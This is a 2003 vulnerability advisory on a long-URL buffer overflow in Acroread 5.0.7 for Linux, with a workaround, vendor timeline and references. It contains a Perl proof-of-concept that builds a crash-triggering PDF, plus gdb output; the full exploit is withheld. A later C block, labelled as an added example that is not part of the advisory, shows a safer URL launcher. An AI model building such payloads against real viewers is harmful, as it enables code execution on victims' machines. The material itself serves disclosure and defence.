Acroread 5.0.7 buffer overflow
  Author: Anonymous
Added: 07/15/2003
Type: Advisory

I. BACKGROUND

Acroread from http://www.adobe.com is the pre-eminent PDF file viewer. The
latest version, Acroread 5.0.7 for Linux, was released on 17 June 2003.

II. DESCRIPTION

Despite recent security fixes, an exploitable buffer overflow with long URL
strings remains. The overflow occurs when you click on the link, and allows
execution of arbitrary code. Acroread versions 5.0.7 and 5.0.5 were tested
on Debian (woody) Linux; other acroread 5.* versions on other UNIX
platforms are expected also to be vulnerable. (Configure Netscape as your
browser, and do not have Netscape running at the time you click.)

III. ANALYSIS

Produce a suitable test file using pdflatex e.g. with:

#!/usr/bin/perl --
#
# Demo for acroread 5.0.7 on Debian Linux
#
use strict;
use warnings;

print '
Writing TeX file ...
';
# For acroread 5.0.5 use 248 Bs instead of 504
# The mailto: URL is padded with 504 "B" bytes followed by 4 "A" bytes;
# the "A"s (0x41414141) are what shows up in the gdb backtrace below.
open P, '>attack.tex' or die "cannot write attack.tex: $!";
print P '
\documentclass[11pt]{letter}
\usepackage{times}
\usepackage[pdfpagemode=none,pdfstartview=FitH]{hyperref}
\begin{document}
   \href{mailto:X',("B"x504).("A"x4),'}
   {\texttt{mailto:X("B"x504).("A"x4)}}
\end{document}
';
close P or die "cannot close attack.tex: $!";
#
print '
Running pdflatex ...
';
system('pdflatex', 'attack') == 0 or die "pdflatex failed: $?";
#
#!#

Acroread has a signal handler and may not crash when the link is clicked,
but gdb shows:

(gdb) run attack.pdf
Starting program: /Acroread507/Reader/intellinux/bin/acroread attack.pdf
Program received signal SIGSEGV, Segmentation fault.
(gdb) where
#0  0x40f50513 in mdNetscapeFront ()
   from /Acroread507/Reader/intellinux/plug_ins/wwwlink.api
Cannot access memory at address 0x41414141

IV. WORKAROUND

Remove the file .../Reader/*/plug_ins/wwwlink.api .

V. EXPLOIT

Censored. Fully working exploit sent to CERT.

VI. COMMENTS

Acroread 5.0.7 for Linux was released on 17 June 2003, and the README file
contains:
   New for Acrobat Reader 5.0.7
   A security patch was applied that solves the problem reported in
   CERT vulnerability 200132 whereby a weblink could execute shell
   commands.
Acroread still uses 'sh -c' via system(3) but disallows embedded single
quotes and replaces dollar ($) and backquote (`) by %24 and %60 in the URL,
then quotes the URL with single quotes like
  sh -c DISPLAY=DISPL BROWSER 'URL'
It seems that when given the example exploit, in a knee-jerk reaction Adobe
encoded the "special" characters used. When told that the "shell
meta-character soup" was larger, they quoted the URL and, seeing how
encoding did not work, courageously banned embedded quotes; they were too
lazy to remove the encoding. They should have replaced system(3) with
fork/setenv/execv instead.
The lengthening of the URL string prompted me to check how acroread handles
long replacements; but even "plain" long strings cause it to fail.
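As an added example (not code from the advisory or from Adobe), here is a launcher that does what the comments above ask for: the URL is handed to the browser via fork/setenv/execv as a single argv element, so no shell ever parses it and no %24/%60 encoding is needed, and a length bound rejects oversized URLs before any copy. The browser path, the DISPLAY handling and the 1024-byte URL_MAX cap are assumptions.

```c
/* Added example, not Adobe's code: launch a URL handler with
 * fork/setenv/execv instead of 'sh -c'. URL_MAX is an assumed cap. */
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define URL_MAX 1024
/* Non-empty, bounded, printable-ASCII URLs only: the length bound is the
 * check a fixed-size copy of the URL in wwwlink.api was missing. */
int url_is_acceptable(const char *url)
{
    size_t n = strlen(url);
    if (n == 0 || n > URL_MAX)
        return 0;
    for (size_t i = 0; i < n; i++)
        if ((unsigned char)url[i] < 0x21 || (unsigned char)url[i] > 0x7e)
            return 0;                      /* controls, spaces, 8-bit */
    return 1;
}

/* Exercise the bound with a constructed URL of n 'B' bytes. */
int accepts_url_of_length(size_t n)
{
    char *buf = malloc(n + 1);
    if (!buf) return -1;
    memset(buf, 'B', n); buf[n] = '\0';
    int ok = url_is_acceptable(buf);
    free(buf);
    return ok;
}

/* The URL is one argv element, so no shell parses it and quotes, $ and
 * backquotes need no encoding. Returns the child's exit status or -1. */
int launch_url(const char *browser, const char *display, const char *url)
{
    if (!url_is_acceptable(url))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)browser, (char *)url, NULL };
        if (display)
            setenv("DISPLAY", display, 1);
        execv(browser, argv);
        _exit(127);                        /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```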

The 5.0.7 README file also contains:
   New for Acrobat Reader 5.0.6
   A security patch was applied that solves the problem reported in
   http://online.securityfocus.com/archive/1/278984 where opening
   the font cache when the application starts up can unintentionally
   cause the permissions of other files to change.
and I confirm that this is solved in 5.0.7.

The changes from 5.0.5 to 5.0.7 are in libCoolType.so, EScript.api and
wwwlink.api only, so acroread 5.0.7 still announces itself, on the splash
screen and in Help > About Acrobat Reader, as 5.0.5. CoolType was for 5.0.6,
wwwlink for 5.0.7; is EScript for http://www.kb.cert.org/vuls/id/184820
though that was meant to affect "full" acrobat only?

Acroread versions 4.* do not seem vulnerable to the buffer overflow, as they
chop the URL string after 1025 (!!??) bytes; but they are vulnerable to the
"shell meta-character soup" (could be protected with the workaround below).

VII. TIMELINE

13 Jun 2003  -10day advisory released
17 Jun 2003  Acroread 5.0.7 for Linux released
23 Jun 2003  iDefense and CERT alerted to buffer overflow
26 Jun 2003  Fully working exploit sent to iDefense
 1 Jul 2003  [email protected] finds same vulnerability
 9 Jul 2003  iDefense does not offer payment

VIII. REFERENCES

CERT vulnerability note
  http://www.kb.cert.org/vuls/id/200132

-10Day CERT Advisory on PDF Files (note that the workaround in the latter
message does not protect against the buffer overflow)
  http://lists.netsys.com/pipermail/full-disclosure/2003-June/010397.html
  http://lists.netsys.com/pipermail/full-disclosure/2003-June/010417.html

Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code
(public report of the same vulnerability)
  http://www.securityfocus.com/archive/1/327335
  http://www.securityfocus.com/archive/1/328472

IX. AUTHOR

Paul Szabo - [email protected]
  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics, University of Sydney 2006, Australia

© Copyright Linux Advisory 2003. All rights reserved.